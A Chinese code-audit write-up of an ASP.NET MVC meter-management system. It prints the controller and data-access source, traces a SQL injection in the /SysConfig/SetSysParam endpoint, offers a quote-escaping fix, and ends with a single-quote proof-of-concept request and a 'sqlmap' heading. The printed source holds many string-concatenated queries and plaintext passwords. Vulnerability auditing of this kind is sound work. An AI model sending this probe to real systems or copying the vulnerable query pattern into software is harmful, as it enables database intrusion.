
ASP.NET代码审计 MVC架构 SQL注入漏洞

 接口路由

/SysConfig/SetSysParam

SysConfigController.cs代码

using System;
using System.Data;
using System.Text;
using System.Web;
using System.Web.Mvc;
using IMP.PageUtils;
using IMP.Services;
using IMP.Utilities;
using IMP.WebCommon;
using IWater.Lib.Modules;

namespace IMP.Controllers;

// System-configuration controller: alarm polling, communication state and the
// daily/monthly meter-reading parameters.
// NOTE(review): no [Authorize], [HttpPost] or [ValidateAntiForgeryToken] is
// visible on any action in this file. Unless a global filter supplies them,
// every action here -- including the state-changing SetConfig and SetSysParam --
// is reachable with a plain GET (the page's PoC below is exactly that).
public class SysConfigController : Controller
{
    // NOTE(review): static fields on an MVC controller are process-wide, i.e.
    // shared by every request and every user, not per-session. The cookie name
    // below is computed from whichever request happens to arrive first.
    private static string strDisposeAlarmCookieName = "";
    // Unused in this file.
    private static bool isExisteTable = false;
    // Unused in this file.
    private static int intBackYear;

    public ActionResult Index()
    {
        return View();
    }

    // Returns an empty SysConfig as JSON (what SysConfig contains is not visible here).
    public JsonResult GetSysConfig()
    {
        SysConfig data = new SysConfig();
        return Json(data, JsonRequestBehavior.AllowGet);
    }

    // Stores the three flags verbatim into static SystemInfo (process-wide
    // state); no validation of the incoming strings.
    public string SetConfig(string UseAlarm, string UseVoice, string AutoPopup)
    {
        SystemInfo.UseAlarm = UseAlarm;
        SystemInfo.UseVoice = UseVoice;
        SystemInfo.AutoPopup = AutoPopup;
        return "";
    }

    // Reports whether the TCP channel is enabled as a localized status string.
    public JsonResult GetComState()
    {
        string commState = (StartModule.TCPChannel.Enable ? "正常" : "中断");
        SysConfig sysConfig = new SysConfig();
        sysConfig.CommState = commState;
        return Json(sysConfig, JsonRequestBehavior.AllowGet);
    }

    // Returns alarms newer than the session/cookie start time as a hand-built
    // JSON-like string: {CookieName:'...',AlarmRecords:'a&b&c&d&e$a&b&c&d&e'}.
    // Records are joined with '&' between fields and '$' between rows.
    public string GetAlarm()
    {
        string text = "";
        if (strDisposeAlarmCookieName == "")
        {
            strDisposeAlarmCookieName = CookieHelper.GetCookieName(base.HttpContext.Request, "DisposeAlarmTime");
        }
        // Default window: the last three days.
        string text2 = DateTime.Now.AddDays(-3.0).ToString("yyyy-MM-dd HH:mm:ss");
        if (SessionUtils.GetSession("QueryAlarmStartTime") != null)
        {
            text2 = SessionUtils.GetSession("QueryAlarmStartTime").ToString();
        }
        else
        {
            // Start time is taken from a client-controlled cookie without any
            // format check and handed to DeviceManager.GetGlobalAlarm as a raw
            // string. NOTE(review): how that helper uses the string is not
            // visible here -- confirm it does not concatenate it into SQL.
            string strName = HttpUtility.UrlEncode(strDisposeAlarmCookieName);
            if (CookieHelper.GetCookie(strName) != null)
            {
                text2 = HttpUtility.UrlDecode(CookieHelper.GetCookie(strName));
            }
            SessionUtils.SetSession("QueryAlarmStartTime", text2);
        }
        DateTime now = DateTime.Now;
        DeviceManager deviceManager = new DeviceManager();
        DataTable globalAlarm = deviceManager.GetGlobalAlarm(now, text2);
        if (globalAlarm == null)
        {
            return "{CookieName:'" + strDisposeAlarmCookieName + "',AlarmRecords:''}";
        }
        StringBuilder stringBuilder = new StringBuilder();
        stringBuilder.Append("{CookieName:'" + strDisposeAlarmCookieName + "',AlarmRecords:'");
        // NOTE(review): column values are appended raw. A quote, '&' or '$'
        // inside a DB value breaks the format, and if the client evaluates this
        // string as JavaScript it is script injection.
        for (int i = 0; i < globalAlarm.Rows.Count; i++)
        {
            stringBuilder.Append(globalAlarm.Rows[i]["单位名称"].ToString());
            stringBuilder.Append("&");
            stringBuilder.Append(globalAlarm.Rows[i]["测点名称"].ToString());
            stringBuilder.Append("&");
            stringBuilder.Append(globalAlarm.Rows[i]["报警日期"].ToString());
            stringBuilder.Append("&");
            stringBuilder.Append(globalAlarm.Rows[i]["报警类型"].ToString());
            stringBuilder.Append("&");
            stringBuilder.Append(globalAlarm.Rows[i]["报警描述"].ToString());
            if (i != globalAlarm.Rows.Count - 1)
            {
                stringBuilder.Append("$");
            }
            else
            {
                // The last row's alarm date becomes the next poll's start time.
                SessionUtils.SetSession("QueryAlarmStartTime", globalAlarm.Rows[i]["报警日期"].ToString());
            }
        }
        stringBuilder.Append("'}");
        return stringBuilder.ToString();
    }

    // Loads the 系统参数 table and exposes the daily/monthly reading times to
    // the view through ViewBag.DayReadDate / ViewBag.MonthReadDate.
    public ActionResult SysParam()
    {
        DataTable sysParam = new SysManager().GetSysParam();
        string text = "";
        for (int i = 0; i < sysParam.Rows.Count; i++)
        {
            text = sysParam.Rows[i]["参数名称"].ToString();
            string text2 = text;
            string text3 = text2;
            if (!(text3 == "日抄表时间"))
            {
                if (text3 == "月抄表时间")
                {
                    base.ViewBag.MonthReadDate = sysParam.Rows[i]["参数值"].ToString();
                }
            }
            else
            {
                base.ViewBag.DayReadDate = sysParam.Rows[i]["参数值"].ToString();
            }
        }
        return View();
    }

    // Route: /SysConfig/SetSysParam?day=...&month=...
    // NOTE(review): both query-string values are forwarded untouched to
    // SysManager.SetSysParam, which concatenates them into SQL text. This is
    // the SQL-injection entry point documented on this page; the action itself
    // applies no validation, verb restriction or anti-forgery check.
    public string SetSysParam(string day, string month)
    {
        return new SysManager().SetSysParam(day, month);
    }
}

关键代码

	// Controller action behind /SysConfig/SetSysParam. It does not inspect the
	// two query-string values at all; they are handed as-is to
	// SysManager.SetSysParam, whose JSON status string is returned verbatim.
	public string SetSysParam(string day, string month)
	{
		var manager = new SysManager();
		return manager.SetSysParam(day, month);
	}
SetSysParam(string day, string month) 方法接收 day、month 两个参数,未做任何校验,直接创建一个 SysManager 实例并把参数原样传给它执行;因此需要到 SysManager 类所在的文件 SysManager.cs 中继续跟踪。

SysManager.cs代码

using System;
using System.Data;
using System.Text;
using IMP.Utilities;

namespace IMP.Services;

// Data-access layer for users, roles, menus and system parameters.
// NOTE(review): every query in this class is built by string concatenation of
// its string parameters; none is parameterized. The SetSysParam case is the one
// this page documents, but the same pattern applies to every method that takes
// an argument. Whether IDbProvider offers a parameterized overload is not
// visible here -- confirm before choosing escaping over parameters.
public class SysManager
{
    // New provider on every access; SystemInfo.DbConection is the connection string.
    private IDbProvider dbHelper => DbFactoryProvider.GetProvider(CurrentDbType.SqlServer, SystemInfo.DbConection);

    // Lists users joined with role and department names; filtered by user ID
    // when oprId is non-empty. oprId is concatenated unquoted into the WHERE.
    public DataTable GetOperators(string oprId)
    {
        string strSql = "Select u.ID,用户名,角色名称 as 角色,m.名称 as 管理,u.DELETEMARK,u.角色ID,u.管理ID From 用户信息 u left join 角色信息 r on u.角色ID=r.ID left join 管理信息 m on u.管理ID=m.ID";
        if (!string.IsNullOrEmpty(oprId))
        {
            strSql = "Select u.ID,用户名,角色名称 as 角色,m.名称 as 管理,u.DELETEMARK,u.角色ID,u.管理ID From 用户信息  u left join 角色信息 r on u.角色ID=r.ID left join 管理信息 m on u.管理ID=m.ID Where u.ID=" + oprId;
        }
        return dbHelper.Fill(strSql);
    }

    // Prefix/substring search on user names. query is placed inside two LIKE
    // literals without escaping (neither quotes nor LIKE wildcards).
    public DataTable GetOperatorBySearch(string query)
    {
        string sqlCmd = "select ID,用户名 from 用户信息 where dbo.fn_GetQuanPin(用户名) like '" + query + "%' or 用户名 like '%" + query + "%'";
        return dbHelper.Fill(sqlCmd);
    }

    public DataTable GetRoles()
    {
        string sqlCmd = "Select * From 角色信息 ";
        return dbHelper.Fill(sqlCmd);
    }

    public DataTable GetDepartments()
    {
        string sqlCmd = "Select * From 管理信息";
        return dbHelper.Fill(sqlCmd);
    }

    // Creates (operId == "0") or updates a user and, when CustomDev is "是",
    // its device list. Returns a JSON status string.
    // NOTE(review): new users get the literal password '123' stored in clear
    // text; RoleName/Company/operId are concatenated unquoted, the rest quoted
    // but unescaped. The "next ID" is read back with Max(Id) rather than the
    // inserted identity, which races under concurrent inserts.
    public string AddOperator(string operId, string UserName, string RoleName, string Company, string CustomDev, string DevList)
    {
        string writeJson = "{\"Result\":\"false\",\"Msg\":\"\"}";
        try
        {
            string sqlQuery = "Select Id From 用户信息 Where 用户名='" + UserName + "'";
            if (!operId.Equals("0"))
            {
                sqlQuery = "Select Id From 用户信息 Where 用户名='" + UserName + "' And Id!=" + operId;
            }
            if (dbHelper.Fill(sqlQuery).Rows.Count > 0)
            {
                writeJson = "{\"Result\":\"false\",\"Msg\":\"用户名已经存在!\"}";
            }
            else
            {
                sqlQuery = "Insert Into 用户信息(用户名,密码,角色ID,管理ID,注册时间,DELETEMARK,自定义测点)Values('" + UserName + "','123'," + RoleName + "," + Company + ",'" + DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss") + "',0,'" + CustomDev + "')";
                if (!operId.Equals("0"))
                {
                    sqlQuery = "Update 用户信息 set 用户名='" + UserName + "',角色ID=" + RoleName + ",管理ID=" + Company + ",自定义测点='" + CustomDev + "' Where Id=" + operId;
                }
                int n = dbHelper.ExecuteNonQuery(sqlQuery);
                if (operId.Equals("0"))
                {
                    sqlQuery = "Select Max(Id) as Id From 用户信息";
                    DataTable dtId = dbHelper.Fill(sqlQuery);
                    if (dtId.Rows.Count > 0)
                    {
                        operId = dtId.Rows[0]["Id"].ToString();
                    }
                }
                if (CustomDev.Equals("是"))
                {
                    sqlQuery = "Select * From 用户测点关系 Where 用户ID=" + operId;
                    if (dbHelper.Fill(sqlQuery).Rows.Count > 0)
                    {
                        sqlQuery = "Update 用户测点关系 Set 用户ID=" + operId + ",设备ID='" + DevList + "',管理ID=" + Company + " Where 用户ID=" + operId;
                        dbHelper.ExecuteNonQuery(sqlQuery);
                    }
                    else
                    {
                        sqlQuery = "Insert Into 用户测点关系(用户ID,设备ID,管理ID)Values(" + operId + ",'" + DevList + "'," + Company + ")";
                        dbHelper.ExecuteNonQuery(sqlQuery);
                    }
                }
                writeJson = ((n > 0) ? "{\"Result\":\"true\",\"Msg\":\"插入成功!\"}" : ((!operId.Equals("0")) ? "{\"Result\":\"false\",\"Msg\":\"更新失败!\"}" : "{\"Result\":\"false\",\"Msg\":\"插入失败!\"}"));
            }
            return writeJson;
        }
        catch (Exception ex)
        {
            // Raw exception text (DB error messages included) goes back to the client.
            return "{\"Result\":\"false\",\"Msg\":\"" + ex.Message + "\"}";
        }
    }

    // Creates (roleId == "0") or renames a role. Returns a JSON status string.
    // Note the failure branches still report "Result":"true".
    public string AddRole(string roleId, string RoleName)
    {
        string writeJson = "{\"Result\":\"false\",\"Msg\":\"\"}";
        try
        {
            string sql = "Select * From 角色信息 Where 角色名称='" + RoleName + "'";
            if (!roleId.Equals("0"))
            {
                sql = "Select * From 角色信息 Where id!=" + roleId + " And 角色名称='" + RoleName + "'";
            }
            if (dbHelper.Fill(sql).Rows.Count > 0)
            {
                writeJson = "{\"Result\":\"false\",\"Msg\":\"角色名称重复\"}";
            }
            else
            {
                sql = "Insert Into 角色信息(角色名称) values('" + RoleName + "')";
                if (!roleId.Equals("0"))
                {
                    sql = "Update 角色信息 set 角色名称='" + RoleName + "' Where id=" + roleId;
                }
                if (dbHelper.ExecuteNonQuery(sql) > 0)
                {
                    writeJson = "{\"Result\":\"true\",\"Msg\":\"添加成功\"}";
                }
                else
                {
                    writeJson = "{\"Result\":\"true\",\"Msg\":\"新增失败\"}";
                    if (!roleId.Equals("0"))
                    {
                        writeJson = "{\"Result\":\"true\",\"Msg\":\"更新失败\"}";
                    }
                }
            }
        }
        catch (Exception ex)
        {
            // Raw exception text goes back to the client.
            writeJson = "{\"Result\":\"false\",\"Msg\":\"" + ex.Message + "\"}";
        }
        return writeJson;
    }

    // Builds a two-level menu tree as hand-assembled JSON (root node named after
    // the customer company). One extra query per top-level menu. Menu names
    // and the company name are inserted without JSON escaping.
    public string GetModuleTree()
    {
        string sql = "Select * From 菜单项管理 Where 父菜单ID=0 Order by 顺序号";
        DataTable dt = dbHelper.Fill(sql);
        StringBuilder builder = new StringBuilder();
        for (int i = 0; i < dt.Rows.Count; i++)
        {
            builder.Append("{\"text\":\"").Append(dt.Rows[i]["菜单名称"].ToString()).Append("\",");
            builder.Append("\"id\":\"").Append(dt.Rows[i]["id"].ToString()).Append("\",");
            sql = string.Concat("Select * From 菜单项管理 where 父菜单ID=", dt.Rows[i]["Id"], " Order by 顺序号");
            DataTable dtSub = dbHelper.Fill(sql);
            if (dtSub.Rows.Count > 0)
            {
                builder.Append("\"state\":\"closed\",");
            }
            builder.Append("\"iconCls\":\"icon-org\",\"children\":[");
            for (int j = 0; j < dtSub.Rows.Count; j++)
            {
                builder.Append("{\"text\":\"").Append(dtSub.Rows[j]["菜单名称"].ToString()).Append("\",");
                builder.Append("\"id\":\"").Append(dtSub.Rows[j]["id"].ToString()).Append("\",");
                builder.Append("\"iconCls\":\"icon-org\"}");
                if (j < dtSub.Rows.Count - 1)
                {
                    builder.Append(",");
                }
            }
            builder.Append("]}");
            if (i < dt.Rows.Count - 1)
            {
                builder.Append(",");
            }
        }
        string jsonStr = "{\"id\":\"0\",\"text\":\"" + SystemInfo.CustomerCompanyName + "\",\"iconCls\":\"icon-org\",\"children\":[" + builder.ToString() + "]}";
        return "[" + jsonStr + "]";
    }

    // Comma-separated menu IDs granted to a role. keyId is concatenated unquoted.
    public string GetModuleByRoleId(string keyId)
    {
        string sql = "Select * From 角色菜单关系表 Where 角色ID=" + keyId;
        DataTable dt = dbHelper.Fill(sql);
        StringBuilder builder = new StringBuilder();
        for (int i = 0; i < dt.Rows.Count; i++)
        {
            builder.Append(dt.Rows[i]["菜单ID"]);
            if (i < dt.Rows.Count - 1)
            {
                builder.Append(",");
            }
        }
        return builder.ToString();
    }

    // Grants and/or revokes one role->menu mapping. Returns {"Data":"1"} on
    // success or no-op, "0" on a failed write, "-1" on an exception (which is
    // swallowed without logging). All three IDs are concatenated unquoted --
    // this is the authorization table, so injection here rewrites permissions.
    public string SetRoleModulePermission(string roleId, string grantIds, string revokeIds)
    {
        string json = "{\"Data\":\"0\"}";
        if (!string.IsNullOrEmpty(grantIds))
        {
            try
            {
                string sql = "Select * From 角色菜单关系表 Where 角色ID=" + roleId + " and 菜单ID=" + grantIds;
                if (dbHelper.Fill(sql).Rows.Count > 0)
                {
                    json = "{\"Data\":\"1\"}";
                }
                else
                {
                    sql = "Insert into 角色菜单关系表(角色ID,菜单ID)values(" + roleId + "," + grantIds + ")";
                    json = ((dbHelper.ExecuteNonQuery(sql) <= 0) ? "{\"Data\":\"0\"}" : "{\"Data\":\"1\"}");
                }
            }
            catch (Exception)
            {
                json = "{\"Data\":\"-1\"}";
            }
        }
        if (!string.IsNullOrEmpty(revokeIds))
        {
            try
            {
                string sql = "Select * From 角色菜单关系表 Where 角色ID=" + roleId + " and 菜单ID=" + revokeIds;
                if (dbHelper.Fill(sql).Rows.Count > 0)
                {
                    sql = "Delete 角色菜单关系表 Where 角色ID=" + roleId + " and 菜单ID=" + revokeIds;
                    json = ((dbHelper.ExecuteNonQuery(sql) <= 0) ? "{\"Data\":\"0\"}" : "{\"Data\":\"1\"}");
                }
                else
                {
                    json = "{\"Data\":\"1\"}";
                }
            }
            catch (Exception)
            {
                json = "{\"Data\":\"-1\"}";
            }
        }
        return json;
    }

    // Child menus of moduleIds, or the top-level menus when it is empty.
    // moduleIds is concatenated unquoted.
    public DataTable GetModules(string moduleIds)
    {
        string sql;
        if (!string.IsNullOrEmpty(moduleIds))
        {
            sql = "Select * From 菜单项管理 Where 父菜单ID=" + moduleIds + " order by 顺序号";
            return dbHelper.Fill(sql);
        }
        sql = "Select * From 菜单项管理 Where 父菜单ID=0 order by 顺序号";
        return dbHelper.Fill(sql);
    }

    // Top-level menus plus a synthetic row for the company root node. The
    // positional Rows.Add assumes a fixed seven-column layout of 菜单项管理.
    public DataTable GetParentModules()
    {
        string sql = "Select * From 菜单项管理 Where 父菜单ID=0  order by 顺序号";
        DataTable dt = dbHelper.Fill(sql);
        dt.Rows.Add(0, 0, SystemInfo.CustomerCompanyName, "", 0, "", "");
        return dt;
    }

    // Creates (mId == "0") or updates a menu entry. Returns a JSON status
    // string. Parent/order/mId are concatenated unquoted, the rest quoted but
    // unescaped; the failure branches still report "Result":"true".
    public string AddOrUpdateModule(string mId, string ModuleName, string Url, string Icon, string Parent, string order)
    {
        string writeJson = "{\"Result\":\"false\",\"Msg\":\"\"}";
        try
        {
            string sql = "Select * From 菜单项管理 Where 菜单名称='" + ModuleName + "'";
            if (!mId.Equals("0"))
            {
                sql = "Select * From 菜单项管理 Where id!=" + mId + " And 菜单名称='" + ModuleName + "'";
            }
            if (dbHelper.Fill(sql).Rows.Count > 0)
            {
                writeJson = "{\"Result\":\"false\",\"Msg\":\"模块(菜单)名称重复\"}";
            }
            else
            {
                if (string.IsNullOrEmpty(order))
                {
                    order = "0";
                }
                sql = "Insert Into 菜单项管理(菜单名称,父菜单ID,入口URL,顺序号,图标) values('" + ModuleName + "'," + Parent + ",'" + Url + "'," + order + ",'" + Icon + "')";
                if (!mId.Equals("0"))
                {
                    sql = "Update 菜单项管理 set 菜单名称='" + ModuleName + "',父菜单ID=" + Parent + ",入口URL='" + Url + "',顺序号=" + order + ",图标='" + Icon + "' Where id=" + mId;
                }
                if (dbHelper.ExecuteNonQuery(sql) > 0)
                {
                    writeJson = "{\"Result\":\"true\",\"Msg\":\"添加成功\"}";
                }
                else
                {
                    writeJson = "{\"Result\":\"true\",\"Msg\":\"新增失败\"}";
                    if (!mId.Equals("0"))
                    {
                        writeJson = "{\"Result\":\"true\",\"Msg\":\"更新失败\"}";
                    }
                }
            }
        }
        catch (Exception ex)
        {
            // Raw exception text goes back to the client.
            writeJson = "{\"Result\":\"false\",\"Msg\":\"" + ex.Message + "\"}";
        }
        return writeJson;
    }

    // Changes a user's password after checking the old one.
    // NOTE(review): passwords are compared and stored as plain-text column
    // values (no hashing). OldPwd is concatenated into the WHERE, so the
    // old-password check itself can be bypassed by injection, and loginId is
    // caller-supplied rather than taken from the authenticated session.
    public string ChangPwd(string loginId, string OldPwd, string NewPwd)
    {
        string writeJson = "{\"Result\":\"false\",\"Msg\":\"\"}";
        try
        {
            string sql = "Select * From 用户信息 Where id=" + loginId + " And 密码='" + OldPwd + "'";
            if (dbHelper.Fill(sql).Rows.Count > 0)
            {
                sql = "Update 用户信息 Set 密码='" + NewPwd + "' Where Id=" + loginId;
                if (dbHelper.ExecuteNonQuery(sql) > 0)
                {
                    return "{\"Result\":\"true\",\"Msg\":\"修改成功!\"}";
                }
                return "{\"Result\":\"true\",\"Msg\":\"修改失败!\"}";
            }
            return "{\"Result\":\"false\",\"Msg\":\"用户输入的旧密码错误!\"}";
        }
        catch (Exception ex)
        {
            // Raw exception text goes back to the client.
            return "{\"Result\":\"false\",\"Msg\":\"" + ex.Message + "\"}";
        }
    }

    public DataTable GetSysParam()
    {
        string sql = "Select * From 系统参数";
        return dbHelper.Fill(sql);
    }

    // Writes the daily and monthly meter-reading times. Reached unchanged from
    // GET /SysConfig/SetSysParam?day=..&month=.. -- this is the injection the
    // page documents: both values land inside single-quoted literals with no
    // escaping, and the method already sends two ';'-separated statements as
    // one batch, so the provider executes multi-statement text. The catch
    // block returns ex.Message, which is what makes the SQL error visible to
    // the caller.
    public string SetSysParam(string day, string month)
    {
        string json = "{\"Result\":false,\"Msg\":\"\"}";
        try
        {
            string sql = "Update 系统参数 Set 参数值='" + day + "' Where 参数名称='日抄表时间';";
            sql = sql + "Update 系统参数 Set 参数值='" + month + "' Where 参数名称='月抄表时间';";
            if (dbHelper.ExecuteNonQuery(sql) > 0)
            {
                return "{\"Result\":true,\"Msg\":\"设置成功\"}";
            }
            return "{\"Result\":false,\"Msg\":\"设置失败\"}";
        }
        catch (Exception ex)
        {
            return "{\"Result\":false,\"Msg\":\"" + ex.Message + "\"}";
        }
    }

    // Returns whether user `id` has a custom device list and, if so, the raw
    // 设备ID value. id is concatenated unquoted in both queries.
    public string GetCustomeDev(string id)
    {
        string sql = "Select * From 用户信息 Where Id=" + id;
        string returnJson = "{\"custom\":\"否\",\"data\":\"\"}";
        DataTable dt = dbHelper.Fill(sql);
        if (dt.Rows.Count > 0)
        {
            string custom = dt.Rows[0]["自定义测点"].ToString();
            if (!string.IsNullOrEmpty(custom))
            {
                if (custom.Equals("否"))
                {
                    returnJson = "{\"custom\":\"否\",\"data\":\"\"}";
                }
                else if (custom.Equals("是"))
                {
                    sql = "Select * From 用户测点关系 Where 用户ID=" + id;
                    DataTable dtL = dbHelper.Fill(sql);
                    returnJson = ((dtL.Rows.Count <= 0) ? "{\"custom\":\"否\",\"data\":\"\"}" : ("{\"custom\":\"是\",\"data\":\"" + dtL.Rows[0]["设备ID"].ToString() + "\"}"));
                }
                else
                {
                    returnJson = "{\"custom\":\"否\",\"data\":\"\"}";
                }
            }
            else
            {
                returnJson = "{\"custom\":\"否\",\"data\":\"\"}";
            }
        }
        return returnJson;
    }

    // Enabled devices visible to a user as a JSON tree-node array; restricted
    // to the user's 设备ID list when custom devices are on. userId is
    // concatenated unquoted, and the stored 设备ID string is spliced verbatim
    // into an IN(...) clause -- a second-order injection path if that column
    // was written from DevList in AddOperator.
    public string GetDevList(string userId)
    {
        DataTable dtStation = new DataTable();
        string strSql = "Select * From 用户信息 Where Id=" + userId;
        DataTable dtU = dbHelper.Fill(strSql);
        string where = " ";
        if (dtU.Rows.Count > 0)
        {
            string custom = dtU.Rows[0]["自定义测点"].ToString();
            if (!string.IsNullOrEmpty(custom) && custom.Equals("是"))
            {
                strSql = "Select * From 用户测点关系 Where 用户ID=" + userId;
                DataTable dtR = dbHelper.Fill(strSql);
                if (dtR.Rows.Count > 0)
                {
                    string devList = dtR.Rows[0]["设备ID"].ToString();
                    if (!string.IsNullOrEmpty(devList))
                    {
                        where = " And Id in(" + devList + ") ";
                    }
                }
            }
        }
        strSql = "select * from 设备信息 where  是否启用='是' " + where;
        dtStation = dbHelper.Fill(strSql);
        StringBuilder builder = new StringBuilder();
        for (int i = 0; i < dtStation.Rows.Count; i++)
        {
            builder.Append("{\"text\":\"").Append(dtStation.Rows[i]["名称"].ToString()).Append("\",");
            builder.Append("\"id\":\"").Append(dtStation.Rows[i]["ID"].ToString()).Append("\",");
            builder.Append("\"iconCls\":\"icon-watermeter\"}");
            if (i < dtStation.Rows.Count - 1)
            {
                builder.Append(",");
            }
        }
        string jsonStr = builder.ToString();
        return "[" + jsonStr + "]";
    }
}

关键代码

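	// Writes the daily and monthly meter-reading times to 系统参数 and returns a
	// JSON status string: {"Result":true,"Msg":"设置成功"} when at least one row
	// was updated, {"Result":false,...} otherwise.
	//
	// day / month are attacker-controlled: they arrive straight from the
	// /SysConfig/SetSysParam query string. The original concatenated them into
	// the SQL text, which is the injection this page documents. The IDbProvider
	// surface visible here only takes a finished SQL string, so this version
	// doubles single quotes -- the only character that terminates a T-SQL
	// string literal -- before concatenation, and treats null as "" (the same
	// value the original concatenation produced). This closes the
	// quoted-literal escape on SQL Server; a parameterized command is still the
	// right fix if the provider exposes one (TODO confirm IDbProvider's API).
	public string SetSysParam(string day, string month)
	{
		string safeDay = (day ?? "").Replace("'", "''");
		string safeMonth = (month ?? "").Replace("'", "''");
		try
		{
			// Two statements in one batch; ExecuteNonQuery returns the total
			// affected rows, so > 0 means at least one parameter row was updated.
			string sql = "Update 系统参数 Set 参数值='" + safeDay + "' Where 参数名称='日抄表时间';";
			sql = sql + "Update 系统参数 Set 参数值='" + safeMonth + "' Where 参数名称='月抄表时间';";
			if (dbHelper.ExecuteNonQuery(sql) > 0)
			{
				return "{\"Result\":true,\"Msg\":\"设置成功\"}";
			}
			return "{\"Result\":false,\"Msg\":\"设置失败\"}";
		}
		catch (Exception)
		{
			// Deliberately not returning ex.Message: echoing the database error
			// text is what made the injection observable to the client.
			return "{\"Result\":false,\"Msg\":\"设置失败\"}";
		}
	}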

这里接收上面传进来的 day、month 参数后直接拼接进 SQL 字符串,造成 SQL 注入漏洞。两个参数都落在单引号字符串字面量内且未做任何转义;该方法本身就把两条 Update 语句用分号拼成一个批处理交给 ExecuteNonQuery 执行,说明底层连接允许多语句执行;同时 catch 块把 ex.Message 原样写回响应,数据库报错信息会直接暴露给客户端。

POC

GET /SysConfig/SetSysParam?day=1%27&month=1 HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36

提交一个单引号后,响应中直接出现 SQL 语法错误——原因是 SetSysParam 的 catch 块把 ex.Message 写进了返回的 JSON,因此可以用报错信息确认注入点存在。

sqlmap


